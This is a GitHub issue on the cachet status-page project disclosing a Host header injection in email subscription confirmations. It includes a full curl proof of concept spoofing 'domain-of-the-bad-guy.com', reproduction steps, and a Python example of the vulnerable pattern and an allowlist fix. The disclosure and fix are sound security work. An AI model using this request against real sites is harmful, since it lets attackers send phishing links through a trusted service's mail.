cachethq / cachet

🚦 The open-source status page system.
https://cachethq.io
MIT License

Host Header Vulnerability in Subscription #4124

Closed chloesoe closed 1 year ago

chloesoe commented 3 years ago

Summary

It is possible to set an arbitrary Host header in a POST to cachet.example.com/subscribe, and this Host is used in the mail confirmation link.

How to reproduce

With curl you can create a POST request with the Host domain-of-the-bad-guy.com, see below:

curl -X POST \
--http1.1 \
--cookie "__hs_opt_out=yes; _icl_visitor_lang_js=en; XSRF-TOKEN=eyJpdiI6ImU2NFdpdjY0YzZJSlwvXC9vMUZlOVZ5QT09IiwidmFsdWUiOiJKNGRhMzc1UzRZejNnbEo4Umt4SjlwRXZ4RTJpbHJ6OGZiSHY1a1F4WWM3SzAwUlZQdHBYTng0aG1BQ1pldWhydFRXZndJNjQ1YUVKcVBzQ3RtY1JXUT09IiwibWFjIjoiNTJmM2Y4OWM1ZTZhZDNhNjkzMWY2MDMwODBkYjNlNGFhMmM0YTRiMDQ0OTE2YjBkOGE3MmY4NGQ5NTk1Yzg0NiJ9; laravel_session=eyJpdiI6IkZcLzJOWFlLbFNyXC9halhEM2VveCtYZz09IiwidmFsdWUiOiJjUzl2K2lKaE0wSXdGQ25XRmRnaFFnSGxNcm85STY1bk1FWEVad3l5M25NQ1VpTW1adkk1NFRZbVlaQTFhZlFKTmlGRDBFcFBETjhSN3FiVFJzYU4wUT09IiwibWFjIjoiNzFjZDU4MjY3MDNhOTVjNTk3ZmFkNmE4ZTI2MzVkM2E5YWZjNmUyNmFlODQyZTMwOTQ2MmUxMDM2NmUzYmVmOCJ9" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
-H "Accept-Language: en-US,en;q=0.5" -H "Content-Type: application/x-www-form-urlencoded" \
-H "Content-Length: 85" \
-H "DNT: 1" \
-H "Connection: keep-alive" \
-H "Referer: https://status.example.com/subscribe" \
-H "Upgrade-Insecure-Requests: 1" \
-H "Host: domain-of-the-bad-guy.com" \
-d "_token=PE8lTFJZfE0CIRHVn2vgDHFDfRsAUEpvBxodEydF&email=youraddress%2Btest1%40gmail.com" \
https://status.example.com/subscribe
  1. Connect with a browser to https://status.example.com/subscribe and run a first subscription for youraddress+test1@gmail.com
  2. Check the network inspector (F12) of your browser. Look for the POST request and update the curl request above:
    • Replace --cookie in curl with the value from your POST request
    • Replace -d "_token... with the value from the request payload.
    • Content-Length: 85 must be the same length as the request payload
  3. Send the curl request and check your youraddress@gmail.com inbox

You get an email to confirm your subscription. The confirmation URL points to the host domain-of-the-bad-guy.com from the Host header.


Version

Reproduced in cachet version 2.3.18
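As an added illustration (not Cachet's code, and not from the reporter), the pattern behind this report and the usual fix, in Python: the unsafe variant builds the confirmation link from the request's Host header exactly as described above, while the hardened variant takes the host from a configured base URL (the equivalent of Laravel's APP_URL) and rejects any Host that is not on an allowlist. CANONICAL_BASE_URL, TRUSTED_HOSTS and the /subscribe/verify/ path are constructed placeholders.

```python
import re

# Constructed configuration, standing in for the app's configured base URL
# and its list of hostnames it is legitimately served under.
CANONICAL_BASE_URL = "https://status.example.com"
TRUSTED_HOSTS = {"status.example.com", "www.status.example.com"}

# A Host header is a hostname or bracketed IPv6 literal with an optional port.
# Anything else (userinfo, paths, whitespace, empty) is treated as malformed.
_HOST_RE = re.compile(
    r"^(?P<host>[a-z0-9.-]+|\[[0-9a-f:.]+\])(?::(?P<port>\d{1,5}))?$"
)


def confirmation_link_unsafe(host_header: str, code: str) -> str:
    """Vulnerable pattern: the link host is whatever the client sent as Host."""
    return f"https://{host_header}/subscribe/verify/{code}"


def normalize_host(host_header: str) -> str:
    """Lower-case the Host value and strip an optional port; reject malformed input."""
    match = _HOST_RE.match(host_header.strip().lower())
    if match is None:
        raise ValueError(f"malformed Host header: {host_header!r}")
    return match.group("host")


def is_trusted_host(host_header: str) -> bool:
    """True only if the normalized Host is on the configured allowlist."""
    try:
        return normalize_host(host_header) in TRUSTED_HOSTS
    except ValueError:
        return False


def confirmation_link_safe(host_header: str, code: str) -> str:
    """Hardened pattern: refuse untrusted Hosts and build the link from configuration."""
    if not is_trusted_host(host_header):
        raise PermissionError(f"untrusted Host header rejected: {host_header!r}")
    return f"{CANONICAL_BASE_URL}/subscribe/verify/{code}"
```

Even when the Host check passes, the link never echoes the header back; the configured base URL is the only source of the hostname in outbound mail.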

welcome[bot] commented 3 years ago

:wave: Thank you for opening your first issue. I'm just an automated bot that's here to help you get the information you need quicker, so please ignore this message if it doesn't apply to your issue. If you're looking for support, you should try the Slack group by registering your email address at https://cachethq-slack.herokuapp.com. Alternatively, email support@alt-three.com for our Professional support service (please note, this is a paid service). If your issue is with documentation, you can suggest edits by clicking the Suggest Edits link on any page, or open an issue at https://github.com/CachetHQ/Docs

jbrooksuk commented 1 year ago

Thank you for your input on Cachet 2.x. We are shifting our attention and resources to Cachet 3.x and will no longer be supporting the 2.x version. If your feedback or issue is relevant to the 3.x series, we encourage you to engage with the new branch.

For more information on the Cachet rebuild and our plans for 3.x, you can read the announcement here.

We appreciate your understanding and look forward to your contributions to the new version.